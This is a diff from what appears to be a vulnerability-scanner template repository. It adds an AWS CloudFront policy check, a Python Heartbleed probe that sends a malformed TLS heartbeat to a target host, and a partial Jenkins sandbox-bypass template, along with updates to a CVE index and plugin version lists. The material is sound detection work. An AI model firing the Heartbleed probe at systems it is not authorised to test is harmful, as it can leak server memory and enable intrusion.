    - https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/distribution-web-values-specify.html
  tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
 variables:
  region: "us-west-2"
 flow: |
  code(1)
  for(let DistributionListItemsId of iterate(template.distributions)){
    set("distribution", DistributionListItemsId)
    code(2)
  }
 self-contained: true
 code:
  - engine:
      - sh
      - bash
    source: |
      aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
    extractors:
      - type: json
        name: distributions
        internal: true
        json:
          - '.[]'
  - engine:
      - sh
      - bash
    source: |
        aws cloudfront get-distribution-config --id $distribution --query 'DistributionConfig.CacheBehaviors.Items[*].ViewerProtocolPolicy' --output json --region $region
    matchers:
      - type: word
        words:
          - '"allow-all"'
    extractors:
      - type: dsl
        dsl:
          - '"CloudFront Viewer Policy " + distribution + " allows all"'
 # digest: 4b0a00483046022100d710e5ab5c7940783bf341bf221f46d1cfe6638e4d33b69cc03a589e3cb0705302210084f5e59cda9f7b0e3fff5500b00eb922fae079e988ce96a49a04de2dc15f9cfc:922c64590222798bb761d5b6d8e72950
--- a/code/cves/2014/CVE-2014-0160.yaml
+++ b/code/cves/2014/CVE-2014-0160.yaml
@ -0,0 +1,139 @@
 id: CVE-2014-0160
 info:
  name: OpenSSL Heartbleed Vulnerability
  author: pussycat0x
  severity: high
  description: |
    The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users, and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users, and impersonate services and users.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/openssl/CVE-2014-0160
  metadata:
    verified: true
  tags: cve,cve2014,openssl,heartbleed,code
 variables:
  url: "{{RootURL}}"
 code:
  - engine:
      - py
      - python3
    source: |
      import os
      import struct
      import socket
      import time
      import select
      from urllib.parse import urlparse
      def h2bin(x):
          return bytes.fromhex(x.replace(' ', '').replace('\n', ''))
      hello = h2bin('''
      16 03 02 00  dc 01 00 00 d8 03 02 53
      43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
      bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
      00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
      00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
      c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
      c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
      c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
      c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
      00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
      03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
      00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
      00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
      00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
      00 0f 00 01 01
      ''')
      hb = h2bin('''
      18 03 02 00 03
      01 40 00
      ''')
      def recvall(s, length, timeout=5):
          endtime = time.time() + timeout
          rdata = b''
          remain = length
          while remain > 0:
              rtime = endtime - time.time()
              if rtime < 0:
                  return None
              r, _, _ = select.select([s], [], [], 5)
              if s in r:
                  data = s.recv(remain)
                  if not data:
                      return None
                  rdata += data
                  remain -= len(data)
          return rdata
      def recvmsg(s):
          hdr = recvall(s, 5)
          if hdr is None:
              return None, None, None
          typ, ver, ln = struct.unpack('>BHH', hdr)
          pay = recvall(s, ln, 10)
          if pay is None:
              return None, None, None
          return typ, ver, pay
      def hit_hb(s):
          s.send(hb)
          while True:
              typ, ver, pay = recvmsg(s)
              if typ is None:
                  return False
              if typ == 24:  # Heartbeat response
                  if len(pay) > 3:
                      print('server is vulnerable')
                      return True
                  return False
              if typ == 21:  # Server alert
                  return False
      def main():
          # Get the URL from the environment variable
          url = os.getenv('url')
          if not url:
              print("URL environment variable is not set.")
              return
          # Parse the URL
          parsed_url = urlparse(url)
          host = parsed_url.hostname
          port = parsed_url.port if parsed_url.port else 443
          if not host:
              return
          # Create a socket connection
          s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          s.connect((host, port))
          # Send Client Hello
          s.send(hello)
          # Wait for Server Hello
          while True:
              typ, ver, pay = recvmsg(s)
              if typ is None:
                  return
              if typ == 22 and pay[0] == 0x0E:  # Server hello done
                  break
          # Send Heartbeat request and check vulnerability
          s.send(hb)
          hit_hb(s)
      if __name__ == '__main__':
          main()
    matchers:
      - type: dsl
        dsl:
          - "contains(response,'server is vulnerable')"
 # digest: 4a0a004730450221009dd56203fe8a75e8d69026162da7c8d74639d3b0002df5712f0e5d96d6be9e890220475807dc2322d0c2eeab4648a8424cdac2a8b67794c062aec537096e033c7c5a:922c64590222798bb761d5b6d8e72950
--- a/contributors.json
+++ b/contributors.json
@ -1469,5 +1469,15 @@
            "email": ""
    }
    },
    {
        "author": "jpg0mez",
        "links": {
            "github": "https://github.com/JPG0mez",
            "twitter": "https://twitter.com/jpgp__",
            "linkedin": "https://www.linkedin.com/in/juan-pablo-gomez-postigo-173a0b163/",
            "website": "",
            "email": ""
    }
    }
 ]
--- a/cves.json
+++ b/cves.json
@ -377,6 +377,7 @@
 {"ID":"CVE-2016-7834","Info":{"Name":"Sony IPELA Engine IP Camera - Hardcoded Account","Severity":"high","Description":"Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2016/CVE-2016-7834.yaml"}
 {"ID":"CVE-2016-7981","Info":{"Name":"SPIP \u003c3.1.2 - Cross-Site Scripting","Severity":"medium","Description":"SPIP 3.1.2 and earlier contains a cross-site scripting vulnerability in valider_xml.php which allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-7981.yaml"}
 {"ID":"CVE-2016-8527","Info":{"Name":"Aruba Airwave \u003c8.2.3.1 - Cross-Site Scripting","Severity":"medium","Description":"Aruba Airwave before version 8.2.3.1 is vulnerable to reflected cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-8527.yaml"}
 {"ID":"CVE-2016-9299","Info":{"Name":"Jenkins CLI - HTTP Java Deserialization","Severity":"critical","Description":"The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-9299.yaml"}
 {"ID":"CVE-2017-0929","Info":{"Name":"DotNetNuke (DNN) ImageHandler \u003c9.2.0 - Server-Side Request Forgery","Severity":"high","Description":"DotNetNuke (aka DNN) before 9.2.0 suffers from a server-side request forgery vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-0929.yaml"}
 {"ID":"CVE-2017-1000028","Info":{"Name":"Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion","Severity":"high","Description":"Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-1000028.yaml"}
 {"ID":"CVE-2017-1000029","Info":{"Name":"Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion","Severity":"high","Description":"Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-1000029.yaml"}
@ -661,6 +662,7 @@
 {"ID":"CVE-2019-0221","Info":{"Name":"Apache Tomcat - Cross-Site Scripting","Severity":"medium","Description":"Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93 are vulnerable to cross-site scripting because the SSI printenv command echoes user provided data without escaping. Note: SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-0221.yaml"}
 {"ID":"CVE-2019-0230","Info":{"Name":"Apache Struts \u003c=2.5.20 - Remote Code Execution","Severity":"critical","Description":"Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation when evaluated on raw user input in tag attributes, which may lead to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-0230.yaml"}
 {"ID":"CVE-2019-0232","Info":{"Name":"Apache Tomcat `CGIServlet` enableCmdLineArguments - Remote Code Execution","Severity":"high","Description":"When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https-//codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https-//web.archive.org/web/20161228144344/https-//blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2019/CVE-2019-0232.yaml"}
 {"ID":"CVE-2019-1003000","Info":{"Name":"Jenkins Script Security Plugin \u003c=1.49 - Sandbox Bypass","Severity":"high","Description":"A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-1003000.yaml"}
 {"ID":"CVE-2019-10068","Info":{"Name":"Kentico CMS Insecure Deserialization Remote Code Execution","Severity":"critical","Description":"Kentico CMS is susceptible to remote code execution via a .NET deserialization vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-10068.yaml"}
 {"ID":"CVE-2019-10092","Info":{"Name":"Apache HTTP Server \u003c=2.4.39 -  HTML Injection/Partial Cross-Site Scripting","Severity":"medium","Description":"Apache HTTP Server versions 2.4.0 through 2.4.39 are vulnerable to a limited cross-site scripting issue affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-10092.yaml"}
 {"ID":"CVE-2019-10098","Info":{"Name":"Apache HTTP server v2.4.0 to v2.4.39 - Open Redirect","Severity":"medium","Description":"In Apache HTTP server 2.4.0 to 2.4.39, Redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an unexpected URL within the request URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-10098.yaml"}
@ -2449,7 +2451,6 @@
 {"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"}
 {"ID":"CVE-2023-6989","Info":{"Name":"Shield Security WP Plugin \u003c= 18.5.9 - Local File Inclusion","Severity":"critical","Description":"The Shield Security Smart Bot Blocking \u0026 Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6989.yaml"}
 {"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"high","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"}
 {"ID":"CVE-2016-9299","Info":{"Name":"Jenkins CLI - HTTP Java Deserialization","Severity":"critical","Description":"The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2016-9299.yaml"}
 {"ID":"CVE-2024-0195","Info":{"Name":"SpiderFlow Crawler Platform - Remote Code Execution","Severity":"critical","Description":"A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0195.yaml"}
 {"ID":"CVE-2024-0200","Info":{"Name":"Github Enterprise Authenticated Remote Code Execution","Severity":"critical","Description":"An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0200.yaml"}
 {"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"}
@ -2634,6 +2635,7 @@
 {"ID":"CVE-2024-4443","Info":{"Name":"Business Directory Plugin \u003c= 6.4.2 - SQL Injection","Severity":"critical","Description":"The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘listingfields’ parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4443.yaml"}
 {"ID":"CVE-2024-44849","Info":{"Name":"Qualitor \u003c= 8.24 - Remote Code Execution","Severity":"critical","Description":"Qualitor up to 8.24 is vulnerable to Remote Code Execution (RCE) via Arbitrary File Upload in checkAcesso.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-44849.yaml"}
 {"ID":"CVE-2024-45195","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"high","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45195.yaml"}
 {"ID":"CVE-2024-45216","Info":{"Name":"Apache Solr - Authentication Bypass","Severity":"critical","Description":"Solr instances using the PKIAuthenticationPlugin, which is enabled by default when Solr Authentication is used, are vulnerable to Authentication bypass.A fake ending at the end of any Solr API URL path, will allow requests to skip Authentication while maintaining the API contract with the original URL Path.This fake ending looks like an unprotected API path, however it is stripped off internally after authentication but before API routing.This issue affects Apache Solr- from 5.3.0 before 8.11.4, from 9.0.0 before 9.7.0.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45216.yaml"}
 {"ID":"CVE-2024-45241","Info":{"Name":"CentralSquare CryWolf - Path Traversal","Severity":"high","Description":"A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45241.yaml"}
 {"ID":"CVE-2024-45388","Info":{"Name":"Hoverfly \u003c 1.10.3 - Arbitrary File Read","Severity":"high","Description":"Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45388.yaml"}
 {"ID":"CVE-2024-45440","Info":{"Name":"Drupal 11.x-dev - Full Path Disclosure","Severity":"medium","Description":"core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-45440.yaml"}
@ -2646,6 +2648,7 @@
 {"ID":"CVE-2024-46986","Info":{"Name":"Camaleon CMS \u003c 2.8.1 Arbitrary File Write to RCE","Severity":"critical","Description":"An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-46986.yaml"}
 {"ID":"CVE-2024-47062","Info":{"Name":"Navidrome \u003c 0.53.0 - Authenticated SQL Injection","Severity":"critical","Description":"Navidrome is an open source web-based music collection server and streamer. Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like `password=...` in the URL (ORM Leak). Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections. Finally, the username is used in a `LIKE` statement, allowing people to log in with `%` instead of their username. When adding parameters to the URL, they are automatically included in an SQL `LIKE` statement (depending on the parameter's name). This allows attackers to potentially retrieve arbitrary information. For example, attackers can use the following request to test whether some encrypted passwords start with `AAA`. This results in an SQL query like `password LIKE 'AAA%'`, allowing attackers to slowly brute-force passwords. When adding parameters to the URL, they are automatically added to an SQL query. The names of the parameters are not properly escaped. This behavior can be used to inject arbitrary SQL code (SQL Injection). These vulnerabilities can be used to leak information and dump the contents of the database and have been addressed in release version 0.53.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-47062.yaml"}
 {"ID":"CVE-2024-4836","Info":{"Name":"Edito CMS - Sensitive Data Leak","Severity":"high","Description":"Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4836.yaml"}
 {"ID":"CVE-2024-4841","Info":{"Name":"LoLLMS WebUI - Subfolder Prediction via Path Traversal","Severity":"medium","Description":"A Path Traversal vulnerability exists in the parisneo/lollms-webui, specifically within the 'add_reference_to_local_mode' function due to the lack of input sanitization. This vulnerability affects versions v9.6 to the latest.\n","Classification":{"CVSSScore":"4"}},"file_path":"http/cves/2024/CVE-2024-4841.yaml"}
 {"ID":"CVE-2024-4879","Info":{"Name":"ServiceNow UI Macros - Template Injection","Severity":"unknown","Description":"ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4879.yaml"}
 {"ID":"CVE-2024-4885","Info":{"Name":"Progress Software WhatsUp Gold GetFileWithoutZip Directory Traversal - Remote Code Execution","Severity":"critical","Description":"This vulnerability allows remote attackers to execute arbitrary code on affected installations of Progress Software WhatsUp Gold. Authentication is not required to exploit this vulnerability.\nThe specific flaw exists within the implementation of GetFileWithoutZip method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the service account.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4885.yaml"}
 {"ID":"CVE-2024-48914","Info":{"Name":"Vendure - Arbitrary File Read","Severity":"critical","Description":"Vendure is an open-source headless commerce platform. Prior to versions 3.0.5 and 2.3.3, a vulnerability in Vendure's asset server plugin allows an attacker to craft a request which is able to traverse the server file system and retrieve the contents of arbitrary files, including sensitive data such as configuration files, environment variables, and other critical data stored on the server. In the same code path is an additional vector for crashing the server via a malformed URI.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-48914.yaml"}
@ -2676,6 +2679,7 @@
 {"ID":"CVE-2024-6289","Info":{"Name":"WPS Hide Login \u003c 1.9.16.4 - Hidden Login Page Disclosure","Severity":"medium","Description":"The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6289.yaml"}
 {"ID":"CVE-2024-6366","Info":{"Name":"User Profile Builder \u003c 3.11.8 - File Upload","Severity":"high","Description":"The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6366.yaml"}
 {"ID":"CVE-2024-6396","Info":{"Name":"Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite","Severity":"critical","Description":"A vulnerability in the `_backup_run` function in aimhubio/aim version 3.19.3 allows remote attackers to overwrite any file on the host server and exfiltrate arbitrary data. The vulnerability arises due to improper handling of the `run_hash` and `repo.path` parameters, which can be manipulated to create and write to arbitrary file paths. This can lead to denial of service by overwriting critical system files, loss of private data, and potential remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-6396.yaml"}
 {"ID":"CVE-2024-6420","Info":{"Name":"Hide My WP Ghost \u003c 5.2.02 - Hidden Login Page Disclosure","Severity":"high","Description":"The Hide My WP Ghost plugin does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-6420.yaml"}
 {"ID":"CVE-2024-6517","Info":{"Name":"Contact Form 7 Math Captcha \u003c= 2.0.1 - Cross-site Scripting","Severity":"medium","Description":"The Contact Form 7 Math Captcha WordPress plugin through 2.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-6517.yaml"}
 {"ID":"CVE-2024-6586","Info":{"Name":"Lightdash v0.1024.6 - Server-Side Request Forgery","Severity":"high","Description":"Server-Side Request Forgery (“SSRF”) in the export dashboard functionality of Lightdash version 0.1024.6 allows remote authenticated threat actors to obtain the session cookie of any user who exports a crafted dashboard. When they are exported, dashboards containing HTML elements can trigger HTTP requests to an external domain that contain the exporting user’s session cookie. The cookie could be stolen by a threat actor and used to hijack application user sessions.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-6586.yaml"}
 {"ID":"CVE-2024-6587","Info":{"Name":"LiteLLM - Server-Side Request Forgery","Severity":"high","Description":"LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6587.yaml"}
--- a/cves.json-checksum.txt
+++ b/cves.json-checksum.txt
@ -1 +1 @@
-f95ff9c55f4996a2780c830e4149e7b7
+834a3ed8fe3e7171d2135982772985b0
--- a/helpers/wordlists/wordpress-plugins.txt
+++ b/helpers/wordlists/wordpress-plugins.txt
@ -12039,7 +12039,6 @@ burnmans-diaspora-button
 burnmans-subjot-button
 burnzone-commenting
 burping-the-corpse-sidebar-widget
 burst-statistics
 burstn-for-wordpress
 burstpay-woocommerce
 bury-admin-bar
--- a/helpers/wordpress/plugins/advanced-custom-fields.txt
+++ b/helpers/wordpress/plugins/advanced-custom-fields.txt
@ -1 +1 @@
-6.3.9
+6.3.10.2
--- a/helpers/wordpress/plugins/breeze.txt
+++ b/helpers/wordpress/plugins/breeze.txt
@ -1 +1 @@
-2.1.17
+2.1.18
--- a/helpers/wordpress/plugins/disable-gutenberg.txt
+++ b/helpers/wordpress/plugins/disable-gutenberg.txt
@ -1 +1 @@
-3.2.1
+3.2.2
--- a/helpers/wordpress/plugins/ewww-image-optimizer.txt
+++ b/helpers/wordpress/plugins/ewww-image-optimizer.txt
@ -1 +1 @@
-7.9.0
+7.9.1
--- a/helpers/wordpress/plugins/ga-google-analytics.txt
+++ b/helpers/wordpress/plugins/ga-google-analytics.txt
@ -1 +1 @@
-20241019
+20241102
--- a/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt
+++ b/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt
@ -1 +1 @@
-8.2.0
+8.2.1
--- a/helpers/wordpress/plugins/google-analytics-for-wordpress.txt
+++ b/helpers/wordpress/plugins/google-analytics-for-wordpress.txt
@ -1 +1 @@
-9.2.0
+9.2.1
--- a/helpers/wordpress/plugins/gutenberg.txt
+++ b/helpers/wordpress/plugins/gutenberg.txt
@ -1 +1 @@
-19.5.0
+19.5.1
--- a/helpers/wordpress/plugins/mailpoet.txt
+++ b/helpers/wordpress/plugins/mailpoet.txt
@ -1 +1 @@
-5.3.4
+5.3.5
--- a/helpers/wordpress/plugins/meta-box.txt
+++ b/helpers/wordpress/plugins/meta-box.txt
@ -1 +1 @@
-5.10.2
+5.10.3
--- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt
+++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt
@ -1 +1 @@
-4.10.61
+4.10.62
--- a/helpers/wordpress/plugins/royal-elementor-addons.txt
+++ b/helpers/wordpress/plugins/royal-elementor-addons.txt
@ -1 +1 @@
-1.7.1
+1.7.1001
--- a/helpers/wordpress/plugins/seo-by-rank-math.txt
+++ b/helpers/wordpress/plugins/seo-by-rank-math.txt
@ -1 +1 @@
-1.0.230
+1.0.231
--- a/helpers/wordpress/plugins/the-events-calendar.txt
+++ b/helpers/wordpress/plugins/the-events-calendar.txt
@ -1 +1 @@
-6.7.1
+6.8.0
--- a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt
+++ b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt
@ -1 +1 @@
-2.16.2
+2.16.3
--- a/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt
+++ b/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt
@ -1 +1 @@
-4.0.0
+4.0.1
--- a/http/cves/2016/CVE-2016-9299.yaml
+++ b/http/cves/2016/CVE-2016-9299.yaml
@ -120,4 +120,4 @@ code:
          - "contains(response,'hudson.remoting.UserRequest')"
          - 'contains(interactsh_protocol, "dns")'
        condition: and
-# digest: 490a0046304402203cca921300c636eb8d986136c3b5dd567649cc0e956e016278f9e8e6d2e2f14602207e558f218d7293d1e2d1fa942bc313b240086e5f74545143c5553d3d044b4831:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402203cca921300c636eb8d986136c3b5dd567649cc0e956e016278f9e8e6d2e2f14602207e558f218d7293d1e2d1fa942bc313b240086e5f74545143c5553d3d044b4831:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2019/CVE-2019-1003000.yaml
+++ b/http/cves/2019/CVE-2019-1003000.yaml
@ -0,0 +1,99 @@
 id: CVE-2019-1003000
 info:
  name: Jenkins Script Security Plugin <=1.49 - Sandbox Bypass
  author: sttlr
  severity: high
  description: |
    A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2019-1003000
    cpe: cpe:2.3:a:jenkins:script_security::::::jenkins::*
  reference:
    - https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266
    - http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_metaprogramming
    - https://github.com/slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins
    - https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION
